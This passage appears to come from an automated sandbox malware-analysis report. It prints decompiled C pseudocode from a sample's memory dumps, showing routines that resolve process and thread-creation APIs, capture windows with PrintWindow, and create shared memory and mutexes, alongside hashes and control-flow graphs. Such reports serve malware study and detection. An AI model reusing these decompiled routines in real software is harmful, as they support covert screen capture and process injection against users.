    						_t89 = _t112 - _v12 + _t68;
    						_v20 = _t89;
    						 *((char*)(_t112 + _t68)) =  *_t89;
    						_t113 = _t112 + 1;
    						_v20 = _v20 + 1;
    						do {
    							 *((char*)(_t113 + _t68)) =  *_v20;
    							_t113 = _t113 + 1;
    							_v20 = _v20 + 1;
    							_t54 =  &_v8;
    							 *_t54 = _v8 - 1;
    						} while ( *_t54 != 0);
    						_v20 = _t113;
    						goto L6;
    					}
    					_t106 = ( *(_t132 + _t131) & 0x000000ff) + (_t70 + 0xfffffffd << 8);
    					_t132 = _t132 + 1;
    					if(_t106 != 0xffffffff) {
    						_t107 = _t106 + 1;
    						_v24 = _t107;
    						goto L19;
    					}
    					_t65 = _a8;
    					 *_t65 = _v20;
    					return _t65 & 0xffffff00 | _t132 == _v28;
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c44ff81751284ea01d6f0471a771e16a5ec247b26127d7ef4fed30ebabef44eb
    • Instruction ID: 1a694d382ac3bb640f6f2fee96d0ea65416989bfb75c5c4a3f011376295fcc7d
    • Opcode Fuzzy Hash: c44ff81751284ea01d6f0471a771e16a5ec247b26127d7ef4fed30ebabef44eb
    • Instruction Fuzzy Hash: 61519230E156079BDB18CE99C8C16EEBBB2BFC5310F24C16DDA069F789D6719981CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B1BC2() {
    				signed int _t23;
    				signed int _t43;
    				signed int _t59;
    				signed int _t60;
    				signed int* _t63;
    				signed int _t75;
    
    				_t23 =  *0x12dc350; // 0x0
    				if(_t23 >= 0x270) {
    					_t75 = 0;
    					do {
    						_t59 = _t75;
    						_t75 = _t75 + 1;
    						0x12db980[_t59] = (( *(0x12db984 + _t59 * 4) ^ 0x12db980[_t59]) & 0x7fffffff ^ 0x12db980[_t59]) >> 0x00000001 ^  *(0x12db028 + ((( *(0x12db984 + _t59 * 4) ^ 0x12db980[_t59]) & 0x7fffffff ^ 0x12db980[_t59]) & 0x00000001) * 4) ^  *(0x12dbfb4 + _t59 * 4);
    					} while (_t75 < 0xe3);
    					if(_t75 < 0x26f) {
    						_t63 =  &(0x12db980[_t75]);
    						do {
    							 *_t63 =  *(0x12db028 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
    							_t63 =  &(_t63[1]);
    						} while (_t63 < 0x12dc33c);
    					}
    					_t60 =  *0x12dc33c; // 0x0
    					_t43 =  *0x12db980; // 0x0
    					 *0x12dc33c = ((_t43 ^ _t60) & 0x7fffffff ^ _t60) >> 0x00000001 ^  *(0x12db028 + (((_t43 ^ _t60) & 0x7fffffff ^ _t60) & 0x00000001) * 4) ^  *0x12dbfb0;
    					_t23 = 0;
    				}
    				 *0x12dc350 = _t23 + 1;
    				return (0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b ^ ((0x12db980[_t23] ^ 0x12db980[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1d65879ce618a60f7e93f6c152cbf32365d8036330e6723c12161e3e02051a31
    • Instruction ID: 991be183e9eb87a241ea6187215fbbd42fae23115d648bd612ce2d2f69b26564
    • Opcode Fuzzy Hash: 1d65879ce618a60f7e93f6c152cbf32365d8036330e6723c12161e3e02051a31
    • Instruction Fuzzy Hash: 1C219236A324908BCB6CDF3CF8AD5A933D2E78A35431A453CE566C7284DB35E412CB40
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction ID: 62648e3c198b3de8352392380962a175740f7c029ee4a5bc3f3ede40ac0aef95
    • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction Fuzzy Hash: 8DE04F7A710151CBD755CA15D482943B7A6FBC9A70B1287A9CE154730BCA34EEC3CAD1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 151 12cde5d-12cde7d call 12b1956 154 12cde7f-12cde81 151->154 155 12cde86-12cde8c 151->155 158 12ce198-12ce19c 154->158 156 12cde8e-12cde95 155->156 157 12cde98-12cde9b 155->157 156->157 159 12cdeac-12cdece GetWindowInfo 157->159 160 12cde9d-12cde9f 157->160 162 12cded7-12cdef7 IntersectRect 159->162 163 12cded0-12cded2 159->163 160->159 161 12cdea1-12cdea9 160->161 161->159 165 12cdef9-12cdf01 162->165 166 12cdf16-12cdf1f 162->166 164 12ce197 163->164 164->158 167 12cdf08-12cdf0f 165->167 168 12cdf03-12cdf05 165->168 169 12cdf64 166->169 170 12cdf21-12cdf28 166->170 167->166 172 12cdf11-12cdf13 167->172 168->167 171 12cdf67-12cdf6a 169->171 173 12cdf2f-12cdf43 IntersectRect 170->173 174 12cdf2a-12cdf2d 170->174 175 12cdf6c-12cdf6f 171->175 176 12cdf78-12cdf83 GetDC 171->176 172->166 173->171 177 12cdf45-12cdf4d 173->177 174->171 175->176 180 12cdf71-12cdf73 175->180 181 12cdfb5-12cdfb7 176->181 182 12cdf85-12cdf98 CreateCompatibleDC ReleaseDC 176->182 178 12cdf4f-12cdf51 177->178 179 12cdf54-12cdf5b 177->179 178->179 179->171 183 12cdf5d-12cdf62 179->183 184 12ce195-12ce196 180->184 181->184 182->181 185 12cdf9a-12cdfac SelectObject 182->185 183->171 184->164 186 12cdfbc-12cdfc4 185->186 187 12cdfae-12cdfaf DeleteDC 185->187 188 12cdfca-12ce00c TlsSetValue 186->188 189 12ce13b-12ce13f 186->189 187->181 192 12ce00e-12ce01e EqualRect 188->192 193 12ce08b-12ce08f 188->193 190 12ce19f-12ce1a3 189->190 191 12ce141-12ce144 189->191 194 12ce1a5-12ce1a8 190->194 195 12ce181-12ce192 SelectObject DeleteDC 190->195 196 12ce14b-12ce153 SetViewportOrgEx 191->196 197 12ce146-12ce149 191->197 192->193 200 12ce020-12ce02d SaveDC 192->200 198 12ce12c-12ce139 TlsSetValue 193->198 199 12ce095-12ce098 193->199 203 12ce1af-12ce1b7 SetViewportOrgEx 194->203 204 12ce1aa-12ce1ad 194->204 195->184 205 12ce159-12ce16f call 12cdd7b DefWindowProcW 196->205 197->196 197->205 198->195 206 12ce09a-12ce0a0 199->206 207 12ce0a2 199->207 201 12ce02f-12ce032 200->201 202 
12ce034-12ce03c SetViewportOrgEx 200->202 201->202 208 12ce042-12ce061 call 12cdd7b SendMessageW 201->208 202->208 209 12ce1bd-12ce1d5 call 12cdd7b PrintWindow 203->209 204->203 204->209 220 12ce175-12ce17c call 12cdd7b 205->220 206->207 210 12ce0a6-12ce0b3 SaveDC 206->210 207->210 223 12ce074-12ce085 call 12cdd7b RestoreDC 208->223 224 12ce063-12ce06e DefWindowProcW 208->224 209->220 225 12ce1d7-12ce1da 209->225 214 12ce0b5-12ce0bd SetViewportOrgEx 210->214 215 12ce0c3-12ce0ed call 12cdd7b SendMessageW RestoreDC 210->215 214->215 226 12ce0fd-12ce10c SendMessageW 215->226 227 12ce0ef-12ce0f7 SetViewportOrgEx 215->227 220->195 223->193 224->223 225->195 229 12ce10e-12ce119 DefWindowProcW 226->229 230 12ce11f-12ce127 call 12cdd7b 226->230 227->226 229->230 230->198
    C-Code - Quality: 95%
    			E012CDE5D(intOrPtr __ecx, signed int __edx) {
    				signed int _t130;
    				signed int _t137;
    				int _t139;
    				void* _t142;
    				void* _t147;
    				signed int _t165;
    				intOrPtr _t191;
    				struct tagRECT _t192;
    				intOrPtr _t195;
    				struct tagRECT _t196;
    				long _t213;
    				long _t214;
    				long _t215;
    				signed int _t216;
    				signed int _t217;
    				struct HDC__* _t220;
    				RECT* _t225;
    				struct HDC__* _t227;
    				long _t228;
    				void* _t229;
    				void* _t231;
    
    				_t216 = __edx;
    				_t229 = _t231 - 0x70;
    				 *((intOrPtr*)(_t229 + 0x58)) = __ecx;
    				 *(_t229 + 0x68) = __edx;
    				_t130 = L012B1956(__edx) & 0x0000ffff;
    				 *(_t229 + 0x5c) = _t130;
    				if((_t130 & 0x00000001) == 0) {
    					if(_t130 == 0) {
    						 *(_t229 + 0x5c) = 2;
    						_t130 =  *(_t229 + 0x5c);
    					}
    					if( *((intOrPtr*)(_t229 + 0x7c)) != 0 && (_t130 & 0x00000002) != 0) {
    						 *(_t229 + 0x5c) = _t130 & 0x0000fffd | 0x00000008;
    					}
    					 *(_t229 + 0x60) = 0;
    					 *(_t229 + 0x64) = 0;
    					 *(_t229 + 0x50) = 0;
    					 *(_t229 + 0x54) = 0;
    					 *(_t229 - 0x34) = 0x3c;
    					if(GetWindowInfo( *(_t229 + 0x68), _t229 - 0x34) != 0) {
    						_t225 =  *(_t229 + 0x78);
    						_t217 = _t216 & 0xffffff00 | IntersectRect(_t229 + 0x30, _t229 - 0x30, _t225) != 0x00000000;
    						 *(_t229 + 0x7b) = _t217;
    						if(_t217 != 0) {
    							_t214 = _t225->top;
    							_t195 =  *((intOrPtr*)(_t229 - 0x2c));
    							if(_t195 < _t214) {
    								 *(_t229 + 0x64) = _t195 - _t214;
    							}
    							_t215 = _t225->left;
    							_t196 =  *(_t229 - 0x30);
    							if(_t196 < _t215) {
    								 *(_t229 + 0x60) = _t196 - _t215;
    							}
    						}
    						_t137 =  *(_t229 + 0x5c) & 0x00000002;
    						 *(_t229 + 0x28) = _t137;
    						if(_t137 == 0) {
    							 *(_t229 + 0x7f) = _t217;
    						} else {
    							if(( *(_t229 - 0x10) & 0x20000000) == 0) {
    								 *(_t229 + 0x7f) = IntersectRect(_t229 + 0x40, _t229 - 0x20, _t225) != 0;
    								if( *(_t229 + 0x7f) != 0) {
    									_t213 = _t225->top;
    									_t191 =  *((intOrPtr*)(_t229 - 0x1c));
    									if(_t191 < _t213) {
    										 *(_t229 + 0x54) = _t191 - _t213;
    									}
    									_t228 = _t225->left;
    									_t192 =  *(_t229 - 0x20);
    									if(_t192 < _t228) {
    										 *(_t229 + 0x50) = _t192 - _t228;
    									}
    								}
    							} else {
    								 *(_t229 + 0x7f) = 0;
    							}
    						}
    						if( *(_t229 + 0x7b) != 0 ||  *(_t229 + 0x7f) != 0) {
    							_t220 = GetDC(0);
    							if(_t220 == 0) {
    								L30:
    								_t139 = 0;
    								goto L59;
    							}
    							_t227 = CreateCompatibleDC(_t220);
    							ReleaseDC(0, _t220);
    							if(_t227 == 0) {
    								goto L30;
    							}
    							_t222 =  *((intOrPtr*)(_t229 + 0x58));
    							_t142 = SelectObject(_t227,  *( *((intOrPtr*)(_t229 + 0x58)) + 0x1c));
    							 *(_t229 + 0x2c) = _t142;
    							if(_t142 != 0) {
    								 *((char*)(_t229 + 0x6f)) = 1;
    								if( *(_t229 + 0x28) == 0) {
    									if(( *(_t229 + 0x5c) & 0x00000004) == 0) {
    										if(( *(_t229 + 0x5c) & 0x00000008) == 0) {
    											L58:
    											SelectObject(_t227,  *(_t229 + 0x2c));
    											DeleteDC(_t227);
    											_t139 =  *((intOrPtr*)(_t229 + 0x6f));
    											goto L59;
    										}
    										if( *(_t229 + 0x60) != 0 ||  *(_t229 + 0x64) != 0) {
    											SetViewportOrgEx(_t227,  *(_t229 + 0x60),  *(_t229 + 0x64), 0);
    										}
    										_t147 = E012CDD7B(_t222, _t229 + 0x30, 0);
    										__imp__PrintWindow( *(_t229 + 0x68), _t227, 0);
    										if(_t147 != 0) {
    											L57:
    											E012CDD7B(_t222, _t229 + 0x30, 1);
    										} else {
    											 *((char*)(_t229 + 0x6f)) = 0;
    										}
    										goto L58;
    									}
    									if( *(_t229 + 0x60) != 0 ||  *(_t229 + 0x64) != 0) {
    										SetViewportOrgEx(_t227,  *(_t229 + 0x60),  *(_t229 + 0x64), 0);
    									}
    									E012CDD7B(_t222, _t229 + 0x30, 0);
    									DefWindowProcW( *(_t229 + 0x68), 0x317, _t227, 0xe);
    									goto L57;
    								}
    								 *(_t229 + 0xc) =  *(_t229 + 0x68);
    								 *(_t229 + 0x10) = _t227;
    								 *((intOrPtr*)(_t229 + 0x1c)) =  *((intOrPtr*)(_t229 + 0x48)) -  *(_t229 + 0x40);
    								 *(_t229 + 0x24) = 1;
    								 *((intOrPtr*)(_t229 + 0x20)) =  *((intOrPtr*)(_t229 + 0x4c)) -  *((intOrPtr*)(_t229 + 0x44));
    								 *((intOrPtr*)(_t229 + 0x14)) = 0;
    								 *((intOrPtr*)(_t229 + 0x18)) = 0;
    								TlsSetValue( *0x12dd83c, _t229 + 8);
    								if( *(_t229 + 0x7b) == 1 && EqualRect(_t229 + 0x40, _t229 + 0x30) == 0) {
    									 *(_t229 + 0x78) = SaveDC(_t227);
    									if( *(_t229 + 0x60) != 0 ||  *(_t229 + 0x64) != 0) {
    										SetViewportOrgEx(_t227,  *(_t229 + 0x60),  *(_t229 + 0x64), 0);
    									}
    									E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x30, 0);
    									 *(_t229 + 8) = 0;
    									SendMessageW( *(_t229 + 0x68), 0x85, 1, 0);
    									if( *(_t229 + 8) == 0) {
    										DefWindowProcW( *(_t229 + 0x68), 0x317, _t227, 2);
    									}
    									E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x30, 1);
    									RestoreDC(_t227,  *(_t229 + 0x78));
    								}
    								if( *(_t229 + 0x7f) != 1) {
    									L51:
    									TlsSetValue( *0x12dd83c, 0);
    									goto L58;
    								} else {
    									if( *(_t229 + 0x50) != 0) {
    										L43:
    										 *(_t229 + 0x7f) = 1;
    										L44:
    										 *(_t229 + 0x78) = SaveDC(_t227);
    										if( *(_t229 + 0x7f) != 0) {
    											SetViewportOrgEx(_t227,  *(_t229 + 0x50),  *(_t229 + 0x54), 0);
    										}
    										E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x40, 0);
    										_t165 = SendMessageW( *(_t229 + 0x68), 0x14, _t227, 0);
    										asm("sbb eax, eax");
    										 *(_t229 + 0x24) =  ~_t165 + 1;
    										RestoreDC(_t227,  *(_t229 + 0x78));
    										if( *(_t229 + 0x7f) != 0) {
    											SetViewportOrgEx(_t227,  *(_t229 + 0x50),  *(_t229 + 0x54), 0);
    										}
    										 *(_t229 + 8) = 0;
    										SendMessageW( *(_t229 + 0x68), 0xf, 0, 0);
    										if( *(_t229 + 8) == 0) {
    											DefWindowProcW( *(_t229 + 0x68), 0x317, _t227, 4);
    										}
    										E012CDD7B( *((intOrPtr*)(_t229 + 0x58)), _t229 + 0x40, 1);
    										goto L51;
    									}
    									 *(_t229 + 0x7f) = 0;
    									if( *(_t229 + 0x54) == 0) {
    										goto L44;
    									}
    									goto L43;
    								}
    							}
    							DeleteDC(_t227);
    							goto L30;
    						} else {
    							_t139 = 1;
    							L59:
    							goto L60;
    						}
    					} else {
    						_t139 = 0;
    						L60:
    						goto L61;
    					}
    				} else {
    					_t139 = 1;
    					L61:
    					return _t139;
    				}
    			}

    APIs
    • GetWindowInfo.USER32 ref: 012CDEC6
    • SelectObject.GDI32(00000000,?), ref: 012CE185
    • DeleteDC.GDI32(00000000), ref: 012CE18C
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 012CE1B7
    • PrintWindow.USER32(?,00000000,00000000), ref: 012CE1CD
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Window$DeleteInfoObjectPrintSelectViewport
    • String ID:
    • API String ID: 1799956499-0
    • Opcode ID: 8ca158e39bf73f4d9dc85065a02bab8ec75b063338a06480a8cf573dd0f721d4
    • Instruction ID: 081846f6af0ad465e94d44895ed00aa2e55a814d917ec4cb944f7c9e360684f0
    • Opcode Fuzzy Hash: 8ca158e39bf73f4d9dc85065a02bab8ec75b063338a06480a8cf573dd0f721d4
    • Instruction Fuzzy Hash: 0DC1447281228EEBDF229FA8DC889ED3FA9BF09740F05012DFB4596251D775C841CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 233 12c1097-12c10ac call 12b1b95 236 12c10ae-12c10b0 233->236 237 12c10b2-12c10bd 233->237 240 12c10ce-12c10d0 236->240 238 12c10bf-12c10c9 GetModuleHandleW 237->238 239 12c10d3-12c1101 call 12c0f86 * 2 call 12b149c 237->239 241 12c10cb 238->241 242 12c1103-12c111b call 12b1479 GetModuleHandleW 238->242 239->241 239->242 244 12c10cd 241->244 242->241 250 12c111d-12c1190 GetProcAddress * 6 242->250 244->240 252 12c119e-12c11a4 250->252 253 12c1192-12c1198 250->253 252->241 254 12c11aa-12c11b0 252->254 253->241 253->252 254->241 256 12c11b6-12c11b8 254->256 256->241 257 12c11be-12c11c0 256->257 257->244
    C-Code - Quality: 97%
    			E012C1097(void* __edi, signed int _a4) {
    				short _v24;
    				intOrPtr _t6;
    				void* _t7;
    				void* _t8;
    				struct HINSTANCE__* _t9;
    				void* _t10;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t19;
    				struct HINSTANCE__* _t20;
    				struct HINSTANCE__* _t23;
    				void* _t24;
    				intOrPtr _t29;
    
    				_t6 = L012B1B95();
    				 *0x12dc750 = _t6;
    				if(_t6 != 0) {
    					__eflags = _a4 & 0x00000001;
    					if((_a4 & 0x00000001) != 0) {
    						_push(__edi);
    						_t7 = E012C0F86(_t6, "GetProcAddress");
    						_t29 =  *0x12dc750; // 0x76670000
    						_t8 = E012C0F86(_t29, "LoadLibraryA");
    						_t23 =  *0x12dc74c; // 0x12b0000
    						_t9 = L012B149C(_t23, _t8, _t7);
    						__eflags = _t9;
    						if(_t9 == 0) {
    							L4:
    							_t10 = 0;
    							__eflags = 0;
    							L5:
    							return _t10;
    						}
    						L8:
    						_t24 = 0x73;
    						L012B1479(_t24,  &_v24);
    						_t13 = GetModuleHandleW( &_v24);
    						 *0x12dc754 = _t13;
    						__eflags = _t13;
    						if(_t13 == 0) {
    							goto L4;
    						}
    						 *0x12dc7b0 = GetProcAddress(_t13, "NtCreateThread");
    						 *0x12dc7b4 = GetProcAddress( *0x12dc754, "NtCreateUserProcess");
    						 *0x12dc7b8 = GetProcAddress( *0x12dc754, "NtQueryInformationProcess");
    						 *0x12dc7bc = GetProcAddress( *0x12dc754, "RtlUserThreadStart");
    						 *0x12dc7c0 = GetProcAddress( *0x12dc754, "LdrLoadDll");
    						_t19 = GetProcAddress( *0x12dc754, "LdrGetDllHandle");
    						 *0x12dc7c4 = _t19;
    						__eflags =  *0x12dc7b0; // 0x770f99e0
    						if(__eflags != 0) {
    							L11:
    							__eflags =  *0x12dc7b8; // 0x770f9670
    							if(__eflags == 0) {
    								goto L4;
    							}
    							__eflags =  *0x12dc7c0; // 0x770c7840
    							if(__eflags == 0) {
    								goto L4;
    							}
    							__eflags = _t19;
    							if(_t19 == 0) {
    								goto L4;
    							}
    							_t10 = 1;
    							goto L5;
    						}
    						__eflags =  *0x12dc7b4; // 0x770fa120
    						if(__eflags == 0) {
    							goto L4;
    						}
    						goto L11;
    					}
    					_t20 = GetModuleHandleW(0);
    					 *0x12dc74c = _t20;
    					__eflags = _t20;
    					if(_t20 != 0) {
    						goto L8;
    					}
    					goto L4;
    				}
    				return 0;
    			}
















    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 012C10C0
    • GetModuleHandleW.KERNEL32(?,00000000,GetProcAddress), ref: 012C1112
    • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 012C1129
    • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 012C113B
    • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 012C114D
    • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 012C115F
    • GetProcAddress.KERNEL32(LdrLoadDll), ref: 012C1171
    • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 012C1183
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
    • API String ID: 667068680-305303173
    • Opcode ID: 41aab72d42e7056ae2f5876b624e3baeb0f98852f889005d78d25f91229a9803
    • Instruction ID: 4aa3526e78ef7277e93ca9afcc38447a0452f0821384102e06c569ed8631397f
    • Opcode Fuzzy Hash: 41aab72d42e7056ae2f5876b624e3baeb0f98852f889005d78d25f91229a9803
    • Instruction Fuzzy Hash: 9E218071F26352DAEB38AF75F99D8663FEDE604A443020A2FDB0093109D7784028CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E012CEB9B(void** __esi, char _a4) {
    				char _v5;
    				struct HDC__* _v12;
    				char _v16;
    				short _v116;
    				char _v524;
    				char _v536;
    				void* _v546;
    				char _v1024;
    				long _t57;
    				int _t60;
    				void* _t63;
    				char _t64;
    				void* _t67;
    				void* _t70;
    				void* _t71;
    				struct HDC__* _t73;
    				signed char _t79;
    				signed int _t81;
    				void* _t93;
    				struct HDC__* _t95;
    				void* _t97;
    				void* _t98;
    				struct HDC__* _t126;
    				void** _t127;
    
    				_t127 = __esi;
    				L012B19F6(__esi, 0x18c);
    				_t57 = TlsAlloc();
    				__esi[1] = _t57;
    				if(_t57 == 0xffffffff) {
    					return 0;
    				}
    				L012B137F(0x84889911,  &_v116, 0);
    				_t60 = RegisterWindowMessageW( &_v116);
    				__esi[2] = _t60;
    				if(_t60 != 0) {
    					L012B137F(0x84889912,  &_v116, 1);
    					_t63 = CreateEventW(0x12dc7c8, 1, 0,  &_v116);
    					__esi[3] = _t63;
    					if(_t63 == 0) {
    						L14:
    						_t64 = 0;
    						L22:
    						goto L23;
    					}
    					L012B137F(0x18782822,  &_v116, 1);
    					_t67 = CreateMutexW(0x12dc7c8, 0,  &_v116);
    					__esi[5] = _t67;
    					if(_t67 == 0) {
    						goto L14;
    					}
    					L012B137F(0x9878a222,  &_v116, 1);
    					_t70 = CreateFileMappingW(0, 0x12dc7c8, 4, 0, 0x3d09128,  &_v116);
    					 *__esi = _t70;
    					if(_t70 == 0) {
    						goto L14;
    					}
    					_t71 = MapViewOfFile(_t70, 2, 0, 0, 0);
    					if(_t71 == 0) {
    						goto L14;
    					}
    					__esi[4] = _t71;
    					__esi[6] = _t71 + 0x128;
    					_v5 = 0;
    					_t73 = GetDC(0);
    					_v12 = _t73;
    					if(_t73 == 0) {
    						L21:
    						_t64 = _v5;
    						goto L22;
    					}
    					__esi[9] = 0;
    					__esi[0xa] = 0;
    					__esi[0xb] = GetDeviceCaps(_t73, 8);
    					__esi[0xc] = GetDeviceCaps(_v12, 0xa);
    					__esi[7] = L012B1235(_v12, __esi[0xb], _t75,  &_v16,  &(__esi[8]), 0, 0);
    					ReleaseDC(0, _v12);
    					if(__esi[7] == 0) {
    						goto L21;
    					}
    					_t112 = _v16;
    					_t79 =  *(_v16 + 0xe) >> 3;
    					__esi[0xe] = _t79;
    					_t81 = (_t79 & 0x000000ff) * __esi[0xb];
    					__esi[0xd] = _t81;
    					if((_t81 & 0x00000003) != 0) {
    						_t81 = (_t81 & 0xfffffffc) + 4;
    					}
    					_t127[0xd] = _t81;
    					L012B1933(_t112);
    					_v5 = 1;
    					if(_a4 != 1) {
    						goto L21;
    					} else {
    						_v5 = 0;
    						L012B16B3( &_v536);
    						L012B11AE( &_v1024);
    						L012B1947( &(_t127[0xf]), 0x12dca08, 0x10);
    						_t127[0x13] = _v546;
    						L012B1947( &(_t127[0x14]),  &_v524, 0x102);
    						L012B137F(0x1898b122,  &_v116, 1);
    						_t93 = CreateMutexW(0x12dc7c8, 0,  &_v116);
    						_t127[0x58] = _t93;
    						if(_t93 != 0) {
    							_t126 = GetDC(0);
    							if(_t126 == 0) {
    								goto L21;
    							}
    							_t95 = CreateCompatibleDC(_t126);
    							_t127[0x55] = _t95;
    							if(_t95 != 0) {
    								_t97 = CreateCompatibleBitmap(_t126, 1, 1);
    								_t127[0x57] = _t97;
    								if(_t97 != 0) {
    									_t98 = SelectObject(_t127[0x55], _t97);
    									_t127[0x56] = _t98;
    									if(_t98 != 0) {
    										_v5 = 1;
    									}
    								}
    							}
    							ReleaseDC(0, _t126);
    							goto L21;
    						}
    						goto L14;
    					}
    				} else {
